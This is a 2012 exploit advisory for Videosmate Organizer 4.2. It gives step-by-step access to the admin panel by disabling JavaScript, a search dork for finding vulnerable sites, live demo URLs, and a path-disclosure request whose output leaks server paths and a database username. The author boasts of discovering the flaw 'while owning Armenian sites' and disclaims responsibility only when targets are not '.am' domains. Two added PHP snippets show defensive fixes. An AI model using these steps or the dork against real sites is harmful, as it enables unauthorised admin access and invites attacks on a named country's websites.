
Videosmate Organizer 4.2 Authentication Bypass / Path Disclosure

Posted Oct 16, 2012
Authored by Akastep

Videosmate Organizer version 4.2 suffers from authentication bypass and path disclosure vulnerabilities.

tags | exploit, vulnerability, bypass, info disclosure
SHA-256 | 880befa250d4287f9d17efed7dffd5623e713602127613fb7304b05c5fb437f4

=====================================================================
Vulnerable software: Videosmate Organizer V 4.2 (all versions)
Vendor: http://videosmate.com/
Software License: Commercial
Vulns: Authentication Bypass & Path Disclosure
Risk: Critical
Dork: intext:Powered by Videosmate Organizer
=====================================================================
Vuln Description:
As I noted above, this script is commercial and that's why today I'm unable (maybe lazy) to show you where the vulnerability is.
I discovered this vulnerability while owning Armenian sites.
The flaw is that if the remote user is not authenticated against the admin panel ( somesite.tld/sitedb/admin/ ),
it seems the script (after the session checking thing) is unable to properly kill its execution.
Since I have no access to the source code of this script, I'll try to imagine how this process goes:


Suppose:

<?php
session_start();

if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>";

/*
Notice:
echo 'JS_REDIRECTION';
** not **
die('JS_REDIRECTION');
*/





/****** PWNED ********/
//YOU ARE ADMIN HERE//
?>


Exploitation is simple like 2x2:

Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php
(If you wonder, then press CTRL+U and you will see something like:

<script> self.location='login.php';</script>
<script> self.location='login.php';</script>
)
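
A hardened form of the imagined check above, as an added example that is not part of the original advisory or the vendor's code: the redirect is sent as an HTTP header and the script stops immediately afterwards. The session key is_admin and the helper name require_admin are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the vendor's code.
// Assumptions: the session key 'is_admin' and the helper name require_admin().

function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }

    if (($_SESSION['is_admin'] ?? false) !== true) {
        // Redirect on the server side instead of relying on client-side JavaScript.
        header('Location: login.php', true, 302);
        // header() only queues a response header. Without exit, the rest of the
        // page would still execute and its output would still reach the client.
        exit;
    }
}

// Call the guard before any other work in every admin script.
require_admin();

// Only an authenticated admin session reaches this point.
echo 'admin panel';
```

The same rule applies to a header('Location: ...') redirect: it must also be followed by exit, otherwise the protected code still runs.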



Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php (<=Disable javascript in your browser or use NoScript then surf there)



This is not the end!! 111))

PATH DISCLOSURE: Direct access to:
site.tld/componentdemo/include/categoryfuncs.php

Demo:
http://www.videosmate.com/componentdemo/include/categoryfuncs.php


Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7

Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7

Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7

Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
Error, query failed
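
One way to stop this leak, as an added example that is not the vendor's code: refuse direct requests to library files, keep PHP diagnostics out of responses, and load the config by a path relative to the file itself. The constant APP_ENTRY and the ../settings layout are assumptions.

```php
<?php
// Added example, not the vendor's code: top of a library file such as
// include/categoryfuncs.php.
// Assumptions: entry scripts define APP_ENTRY before including this file,
// and conf.php lives in a settings/ directory one level above include/.

// Refuse direct HTTP requests to a file that is only meant to be included.
if (!defined('APP_ENTRY')) {
    http_response_code(404);
    exit;
}

// Keep warnings (and the filesystem paths they contain) out of responses;
// write them to the server error log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Resolve the config relative to this file rather than the current working
// directory, and fail closed: require_once stops the script if the file is
// missing, where include only warns and carries on to the database query.
require_once __DIR__ . '/../settings/conf.php';
```

Setting display_errors = Off in php.ini also covers errors raised before any script code runs, which ini_set() cannot.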




Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))


=====================================================================

SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
=====================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
=====================================================================

/AkaStep

